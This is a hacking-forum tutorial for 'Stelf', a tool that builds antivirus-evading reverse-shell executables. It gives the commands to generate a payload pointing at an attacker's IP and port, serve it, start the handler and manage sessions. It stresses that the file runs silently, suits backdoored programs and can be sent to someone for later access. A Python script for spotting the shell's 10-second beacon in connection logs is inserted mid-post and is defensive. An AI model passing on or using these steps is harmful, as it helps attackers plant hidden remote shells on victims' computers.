Getting Stealthy with Stelf

Hello 0x00’ers!

In this tutorial, I am going to be giving away some content that has been sought after for a long time. Everybody knows that most prebuilt tools such as Metasploit, the payloads generated by them, and the encoders used with them don’t work. They get picked up by anti-virus and they get stuck in filters; using them will generally give you a bad time no matter how many awkward tutorials you follow.

This is not because they are badly written; no, they are very good tools. The problem lies in the fact that they are very popular. Anti-virus packages work on blacklists, and when thousands of newbie hackers are generating payloads en masse, those payloads soon get added to these blacklists, making all that hard work moot.

I am going to show you how to use literally one of the easiest tools written by @Joe_Schmoe.

Downloading Stelf

Go over to the GitLab and get a copy.

Once that’s downloaded, unzip the file and you’re ready for the next step.

Generating your Stelf Payload

python2 encode.py yourip theport outputfilename.exe

Replace these values with the ones you will need. In my case it looks like this:

python2 encode.py 192.168.1.89 8080 scaryfile.exe

It will also ask you if you want to start a webserver for better sharing purposes. You can enter “y” and hit enter to do this.

Once you’ve transferred your executable wherever you may need it, start the handler and you’ll be ready to go.

Using Stelf

Fire up the handler with python2 handler.py and then just open the file.

In my case I had a shell open up before from persistence on this machine. I’ve been testing Stelf on this VM before.

There’s no point in me posting an image of the Windows machine because nothing happens: you just click it and nothing appears to happen (it opens in the background). This behavior is nice as it will work with backdoored programs really nicely. You’ll never know it was there.

The shell will attempt a reconnection every 10 seconds, and it doesn’t require any other code. It is completely self-contained. Theoretically, you could send this to somebody, never open your handler, and, provided they don’t shut down their computer and kill the process, you can open your handler any time and get a shell.
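Seen from the network side, that fixed 10-second retry loop is a regular beacon that shows up in connection logs whether or not a handler is listening. The following is an added example, not part of the original post or of Stelf: it flags flows with a near-constant interval, and the log layout, thresholds and source addresses are assumptions made up for the illustration.

```python
import statistics
from collections import defaultdict
from datetime import datetime, timedelta

def find_beacons(lines, period=10.0, tolerance=1.5, min_events=6, max_jitter=1.0):
    """Flag flows whose connection attempts repeat at a near-fixed period.

    Each line is 'ISO-timestamp src dst dport' (an assumed log layout). A flow
    is flagged when it has >= min_events attempts, its median gap is within
    `tolerance` seconds of `period`, and the gaps' standard deviation is
    <= max_jitter seconds. Failed attempts count: the retry loop is the signal.
    """
    flows = defaultdict(list)
    for line in lines:
        if not line.strip():
            continue
        ts, src, dst, dport = line.split()
        flows[(src, dst, int(dport))].append(datetime.fromisoformat(ts))
    hits = []
    for key, stamps in flows.items():
        if len(stamps) < min_events:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        median, jitter = statistics.median(gaps), statistics.pstdev(gaps)
        if abs(median - period) <= tolerance and jitter <= max_jitter:
            hits.append({"flow": key, "attempts": len(stamps),
                         "median_gap": median, "jitter": round(jitter, 2)})
    return hits

def sample_log():
    """Constructed records: one host on a ~10 s retry loop, one browsing."""
    t0 = datetime(2024, 1, 1, 10, 0, 0)
    def rows(offsets, src, dst, dport):
        return [f"{(t0 + timedelta(seconds=s)).isoformat()} {src} {dst} {dport}"
                for s in offsets]
    # Destination reuses the handler address from the tutorial; sources are made up.
    retry = rows([0, 10, 20, 31, 41, 51, 61, 71], "10.0.0.5", "192.168.1.89", 8080)
    human = rows([0, 3, 47, 52, 140, 141, 300, 420], "10.0.0.7", "192.168.1.20", 443)
    return retry + human

if __name__ == "__main__":
    for hit in find_beacons(sample_log()):
        print(hit)
```

Real traffic adds connect timeouts and clock skew, so widen `tolerance` and `max_jitter` before running this over production logs.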

In future, it may be possible to make it run persistence when it is first opened.

Quick Stelf Commands

l - List sessions

i - Interact with sessions

ctrl+c - Background session

Once inside a session, the ‘help’ command will show you the way. Also, remember this is a normal shell too, so typing any Windows cmd command will work.

I hope this helps you out. I also hope you guys realise how powerful Stelf is, especially since it doesn’t get picked up by any AV without even needing an encoder (encoders look fishy).

@Joe_schmoe has poured his heart and soul into this, and to just finally show it off to the world is really rewarding.

That’s all for today, guys!

- pry0cc